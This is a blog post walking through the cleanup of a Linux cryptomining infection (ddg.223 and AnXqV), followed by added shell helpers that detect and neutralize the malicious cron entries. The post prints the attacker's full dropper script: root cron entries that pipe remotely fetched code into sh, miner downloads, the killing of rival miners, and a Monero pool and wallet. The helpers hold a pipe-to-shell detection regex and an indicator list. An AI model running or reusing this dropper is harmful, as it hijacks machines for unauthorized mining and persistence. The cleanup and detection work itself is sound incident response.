• Hands-on malware removal: ddg.223 and AnXqV


    htop shows something abnormal:

    Then a suspicious process turns up:

    First check crontab; there is the problem:

    # crontab -l
    */5 * * * * curl -fsSL http://www.bdyutiudwj.com/i.sh?1 | sh

    Comment out the scheduled task!!!

    # crontab -l
    #*/5 * * * * curl -fsSL http://www.bdyutiudwj.com/i.sh?1 | sh

    Download the script:

    http://www.bdyutiudwj.com/i.sh?1

    Its contents:

    export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
    
    echo "*/5 * * * * curl -fsSL http://www.bdyutiudwj.com/i.sh?1 | sh" > /var/spool/cron/root
    mkdir -p /var/spool/cron/crontabs
    echo "*/5 * * * * curl -fsSL http://www.bdyutiudwj.com/i.sh?1 | sh" > /var/spool/cron/crontabs/root
    
    if [ ! -f "/tmp/ddg.223" ]; then
        curl -fsSL http://www.bdyutiudwj.com/ddg.$(uname -m) -o /tmp/ddg.223
    fi
    chmod +x /tmp/ddg.223 && /tmp/ddg.223
    
    CleanTail()
    {
        ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
    }
    
    DoYam()
    {
        if [ ! -f "/tmp/AnXqV.yam" ]; then
            curl -fsSL http://www.bdyutiudwj.com/yam -o /tmp/AnXqV.yam
        fi
        chmod +x /tmp/AnXqV.yam
        /tmp/AnXqV.yam -c x -M stratum+tcp://44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM:x@xmr.crypto-pool.fr:443/xmr
    }
    
    DoMiner()
    {
        if [ ! -f "/tmp/AnXqV" ]; then
            curl -fsSL http://www.bdyutiudwj.com/minerd -o /tmp/AnXqV
        fi
        chmod +x /tmp/AnXqV
        /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM -p x
    }
    
    DoMinerNoAes()
    {
        if [ ! -f "/tmp/AnXqV.noaes" ]; then
            curl -fsSL http://www.bdyutiudwj.com/minerd.noaes -o /tmp/AnXqV.noaes
        fi
        chmod +x /tmp/AnXqV.noaes
        /tmp/AnXqV.noaes -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM -p x
    }
    
    ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "AnXqV" || DoMiner
    ps auxf|grep -v grep|grep "AnXqV" || DoYam
    ps auxf|grep -v grep|grep "AnXqV" || DoMinerNoAes
    Next check the cron spool directories that the script writes to:

    # tree /var/spool/cron/
    /var/spool/cron/
    ├── crontabs
    │   └── root
    └── root
    # view the contents and comment them out
    cat /var/spool/cron/root /var/spool/cron/crontabs/root
    #*/5 * * * * curl -fsSL http://www.bdyutiudwj.com/i.sh?1 | sh
    #*/5 * * * * curl -fsSL http://www.bdyutiudwj.com/i.sh?1 | sh

    Finally, kill the suspicious processes (ddg.223 and the AnXqV miners) and remove the binaries the script dropped under /tmp; the problem is solved. The order matters: the cron entries have to go first, because every five minutes they refetch i.sh, which re-downloads and restarts whatever is missing, so killing processes while the cron job is still active only triggers a reinstall.
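    The cleanup above as a small set of shell helpers. This is an added example, not code from the original post: it looks for "download and pipe into a shell" lines in the cron files the dropper writes, comments them out while keeping a copy of the evidence, finds processes whose command line contains an indicator from the i.sh script (host, pool, drop paths, wallet), and lists executables left in /tmp. The function names are mine, the cron paths /etc/crontab and /etc/cron.d are standard additions the post does not mention, and the demo at the bottom runs on a constructed crontab rather than a live host.

```shell
#!/bin/sh
# Added example (not from the original post): triage helpers for the cron-driven
# miner dropper shown above. Each function takes the path or file it should
# inspect, so the same checks run on a live host or on files copied off one.

# Indicators lifted from the i.sh script above: its download host, pool, drop
# paths and wallet. /tmp/AnXqV also covers /tmp/AnXqV.yam and /tmp/AnXqV.noaes.
IOCS='www.bdyutiudwj.com
xmr.crypto-pool.fr
/tmp/ddg.223
/tmp/AnXqV
44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM'

# ERE for an *uncommented* cron line that downloads something and pipes it
# straight into a shell: curl/wget ... | sh, | bash, | dash, | zsh, | ksh.
PIPE_TO_SHELL='^[^#]*(curl|wget)[^|]*[|][[:space:]]*(ba|da|z|k)?sh([[:space:]]|$)'

# Print every matching line (with line numbers) from the cron files given.
# Usage: find_pipe_to_shell /var/spool/cron/root /var/spool/cron/crontabs/root /etc/crontab /etc/cron.d/*
find_pipe_to_shell() {
    grep -nE -- "$PIPE_TO_SHELL" "$@" 2>/dev/null
}

# Comment out the matching lines in one cron file. A timestamped copy is taken
# first so the evidence survives, and the file is rewritten through cat rather
# than mv so it keeps its owner and 0600 mode (cron ignores mis-owned files).
neutralize_cron_file() {
    f="$1"
    cp -p "$f" "$f.bak.$(date +%s)"
    sed -E 's@('"$PIPE_TO_SHELL"'.*)@#\1@' "$f" > "$f.tmp" && cat "$f.tmp" > "$f"
    rm -f "$f.tmp"
}

# PIDs whose command line contains any IOC. $1 holds the output of
# "ps -eo pid=,args=" (no header), so a saved capture can be checked too.
pids_matching_iocs() {
    ioc=$(mktemp)
    printf '%s\n' "$IOCS" > "$ioc"
    grep -F -f "$ioc" "$1" | awk '{print $1}'
    rm -f "$ioc"
}

# Executable regular files directly under a directory; the dropper only ever
# writes its binaries to /tmp, so list_executables /tmp is the place to look.
list_executables() {
    find "$1" -maxdepth 1 -type f -perm -100
}

# The full cleanup on a live host, in the order that matters: cron first
# (otherwise i.sh reinstalls everything within five minutes), then processes,
# then files. Binaries are only listed, not deleted, so they can be copied off
# for analysis first; delete them by hand afterwards.
triage_host() {
    for f in /var/spool/cron/root /var/spool/cron/crontabs/root /etc/crontab /etc/cron.d/*; do
        [ -f "$f" ] && find_pipe_to_shell "$f" && neutralize_cron_file "$f"
    done
    cap=$(mktemp)
    ps -eo pid=,args= > "$cap"
    pids_matching_iocs "$cap" | while read -r pid; do kill -9 "$pid"; done
    rm -f "$cap"
    list_executables /tmp
}

# Stand-alone demo on constructed data (a made-up root crontab); no host needed.
demo() {
    d=$(mktemp -d)
    printf '%s\n' \
        '*/5 * * * * curl -fsSL http://www.bdyutiudwj.com/i.sh?1 | sh' \
        '0 3 * * * /usr/bin/logrotate /etc/logrotate.conf' > "$d/root"
    echo "== suspicious lines =="; find_pipe_to_shell "$d/root"
    neutralize_cron_file "$d/root"
    echo "== after neutralizing =="; cat "$d/root"
    rm -rf "$d"
}
demo
```

    On a real host, run triage_host as root after copying the cron files and the /tmp binaries somewhere safe; the .bak copies and the listing it prints are what you keep for the post-mortem. Because i.sh is fetched by root's crontab, the machine should be treated as fully compromised, and how the crontab entry got there in the first place still has to be answered.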

  • Original URL: https://www.cnblogs.com/bass6/p/6487253.html